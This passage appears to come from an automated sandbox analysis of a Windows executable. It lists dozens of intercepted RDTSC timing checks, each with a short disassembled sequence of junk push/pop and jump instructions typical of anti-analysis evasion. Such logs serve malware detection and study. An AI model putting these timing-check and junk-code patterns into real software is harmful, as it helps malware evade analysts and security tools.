Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1249B85 second address: 1249B89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1249CD4 second address: 1249CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1249CD8 second address: 1249D18 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F04D4C79EA6h 0x00000008 jmp 00007F04D4C79EB7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jng 00007F04D4C79EA6h 0x00000016 pushad 0x00000017 popad 0x00000018 jns 00007F04D4C79EA6h 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 je 00007F04D4C79EACh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 124A3F9 second address: 124A407 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A4Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12508C9 second address: 12508D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1250A5E second address: 1250A62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1250A62 second address: 1250A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1250A68 second address: 1250A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1250A72 second address: 1250A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1250A76 second address: 1250A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1253468 second address: 12534A6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F04D4C79EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F04D4C79EB2h 0x00000010 jo 00007F04D4C79EA6h 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F04D4C79EB8h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11AF58E second address: 11AF5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125A356 second address: 125A35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125A35A second address: 125A360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125A360 second address: 125A38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jns 00007F04D4C79EB2h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007F04D4C79EB0h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125A38E second address: 125A3AF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F04D4C82A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F04D4C82A53h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125A3AF second address: 125A3B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125A4E4 second address: 125A4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007F04D4C82A61h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125A4F3 second address: 125A50C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C79EB5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125A50C second address: 125A522 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04D4C82A52h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125A522 second address: 125A542 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F04D4C79EB8h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125A542 second address: 125A546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125A819 second address: 125A81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125F21B second address: 125F225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F04D4C82A46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F225 second address: 125F233 instructions: 0x00000000 rdtsc 0x00000002 je 00007F04D4C79EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F233 second address: 125F24E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F24E second address: 125F26E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F04D4C79EB3h 0x00000008 jc 00007F04D4C79EA6h 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F56B second address: 125F589 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F04D4C82A52h 0x00000008 jc 00007F04D4C82A46h 0x0000000e jo 00007F04D4C82A46h 0x00000014 jne 00007F04D4C82A4Eh 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F589 second address: 125F594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F594 second address: 125F5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F04D4C82A59h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F5B6 second address: 125F5BB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125FC27 second address: 125FC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12605A8 second address: 12605AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1261F68 second address: 1261F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1261F6C second address: 1261F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F04D4C79EB0h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1261F84 second address: 1261F9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04D4C82A4Ch 0x00000009 jc 00007F04D4C82A46h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126503A second address: 1265048 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F04D4C79EA8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1265048 second address: 126504C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126481A second address: 1264835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C79EB7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264835 second address: 126485B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F04D4C82A50h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F04D4C82A4Eh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12649A9 second address: 12649AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264DAB second address: 1264DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A850 second address: 126A869 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F04D4C79EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F04D4C79EABh 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A869 second address: 126A87C instructions: 0x00000000 rdtsc 0x00000002 js 00007F04D4C82A46h 0x00000008 jo 00007F04D4C82A46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A87C second address: 126A882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A882 second address: 126A8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C82A50h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A8A3 second address: 126A8B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jnl 00007F04D4C79EA6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126A8B4 second address: 126A8C8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F04D4C82A4Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126AA4D second address: 126AA51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B360 second address: 126B366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B366 second address: 126B386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jns 00007F04D4C79EA6h 0x0000000c popad 0x0000000d jmp 00007F04D4C79EB3h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B386 second address: 126B3A6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F04D4C82A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F04D4C82A4Eh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B66B second address: 126B66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126B66F second address: 126B68E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F04D4C82A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F04D4C82A55h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126BC6D second address: 126BC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F04D4C79EB4h 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126C268 second address: 126C26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126C26E second address: 126C272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126C272 second address: 126C276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12715AD second address: 12715B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12715B1 second address: 12715C1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F04D4C82A46h 0x00000008 ja 00007F04D4C82A46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270A2A second address: 1270A30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270A30 second address: 1270A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270A34 second address: 1270A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270C04 second address: 1270C09 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270D57 second address: 1270D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270D5B second address: 1270D62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270D62 second address: 1270D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1271175 second address: 127117D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127117D second address: 127118A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F04D4C79EA6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127118A second address: 127119C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04D4C82A4Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127119C second address: 12711D3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F04D4C79EB2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F04D4C79EB4h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jo 00007F04D4C79EACh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127130F second address: 127131A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280DE3 second address: 1280DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C79EB4h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F0B3 second address: 127F0BD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F212 second address: 127F217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F217 second address: 127F234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F04D4C82A58h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F234 second address: 127F23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F4F0 second address: 127F515 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A57h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F04D4C82A48h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F639 second address: 127F63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F63F second address: 127F643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F643 second address: 127F64E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F64E second address: 127F654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F654 second address: 127F67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jno 00007F04D4C79EA6h 0x0000000e jmp 00007F04D4C79EB5h 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F67B second address: 127F682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F682 second address: 127F6A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EB9h 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F04D4C79EA6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F802 second address: 127F80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F80B second address: 127F837 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EAEh 0x00000007 pushad 0x00000008 jmp 00007F04D4C79EB9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F837 second address: 127F83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127FDBC second address: 127FDD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EB1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EBB7 second address: 127EBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EBBB second address: 127EBE0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F04D4C79EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F04D4C79EB5h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EBE0 second address: 127EBE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EBE6 second address: 127EBEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EBEA second address: 127EC0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EC0B second address: 127EC11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12868E9 second address: 12868EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12868EF second address: 12868F9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F04D4C79EA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12868F9 second address: 1286920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F04D4C82A4Eh 0x0000000c jnc 00007F04D4C82A4Eh 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12862EF second address: 128630A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C79EB6h 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128630A second address: 1286314 instructions: 0x00000000 rdtsc 0x00000002 je 00007F04D4C82A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286489 second address: 128648F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128648F second address: 12864B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F04D4C82A4Ah 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F04D4C82A4Eh 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12864B0 second address: 12864B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12864B8 second address: 12864BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128C5B2 second address: 128C5B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
